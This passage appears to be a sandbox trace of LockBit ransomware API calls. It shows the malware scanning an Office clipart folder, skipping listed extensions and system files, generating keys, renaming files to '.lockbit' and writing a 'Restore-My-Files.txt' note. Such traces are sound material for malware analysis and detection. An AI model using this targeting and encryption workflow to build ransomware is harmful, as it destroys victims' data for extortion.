ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb54, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105336.WMF", cAlternateFileName="")) returned 1 [0138.726] lstrcmpiW (lpString1=".", lpString2="J0105336.WMF") returned -1 [0138.726] lstrcmpiW (lpString1="..", lpString2="J0105336.WMF") returned -1 [0138.726] PathFindExtensionW (pszPath="J0105336.WMF") returned=".WMF" [0138.726] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.726] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.727] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.727] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105336.WMF") returned 1 [0138.728] lstrcmpiW (lpString1="ntldr", lpString2="J0105336.WMF") returned 1 [0138.728] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105336.WMF") returned 1 [0138.728] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105336.WMF") returned -1 [0138.728] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105336.WMF") returned -1 [0138.728] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105336.WMF") returned 1 [0138.728] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105336.WMF") returned -1 [0138.728] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.728] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned=".WMF" [0138.728] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.728] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.729] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.729] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.730] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.730] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.lockbit") returned 72 [0138.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.730] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.730] malloc (_Size=0x40068) returned 0x3e70008 [0138.730] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2900) returned 1 [0138.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.731] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.735] malloc (_Size=0xa6) returned 0x77d7a8 [0138.735] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.736] free (_Block=0x77d7a8) [0138.736] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.736] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.736] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2d40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105338.WMF", cAlternateFileName="")) returned 1 [0138.736] lstrcmpiW (lpString1=".", lpString2="J0105338.WMF") returned -1 [0138.736] lstrcmpiW (lpString1="..", lpString2="J0105338.WMF") returned -1 [0138.736] PathFindExtensionW (pszPath="J0105338.WMF") returned=".WMF" [0138.736] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.736] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.736] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.737] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.738] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.738] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105338.WMF") returned 1 [0138.738] lstrcmpiW (lpString1="ntldr", lpString2="J0105338.WMF") returned 1 [0138.738] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105338.WMF") returned 1 [0138.739] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105338.WMF") returned -1 [0138.739] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105338.WMF") returned -1 [0138.739] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105338.WMF") returned 1 [0138.739] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105338.WMF") returned -1 [0138.739] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.739] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned=".WMF" [0138.739] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.739] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.739] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.740] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.740] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.lockbit") returned 72 [0138.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.740] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.740] malloc (_Size=0x40068) returned 0x3df0008 [0138.741] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11584) returned 1 [0138.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.741] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.745] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.745] malloc (_Size=0xa6) returned 0x77d7a8 [0138.745] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.746] free (_Block=0x77d7a8) [0138.746] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.746] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.746] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.746] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x42a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105348.WMF", cAlternateFileName="")) returned 1 [0138.749] lstrcmpiW (lpString1=".", lpString2="J0105348.WMF") returned -1 [0138.749] lstrcmpiW (lpString1="..", lpString2="J0105348.WMF") returned -1 [0138.749] PathFindExtensionW (pszPath="J0105348.WMF") returned=".WMF" [0138.749] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.750] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.751] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.751] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105348.WMF") returned 1 [0138.751] lstrcmpiW (lpString1="ntldr", lpString2="J0105348.WMF") returned 1 [0138.751] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105348.WMF") returned 1 [0138.752] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105348.WMF") returned -1 [0138.752] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105348.WMF") returned -1 [0138.752] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105348.WMF") returned 1 [0138.752] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105348.WMF") returned -1 [0138.752] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.752] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned=".WMF" [0138.752] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.752] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.752] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.753] 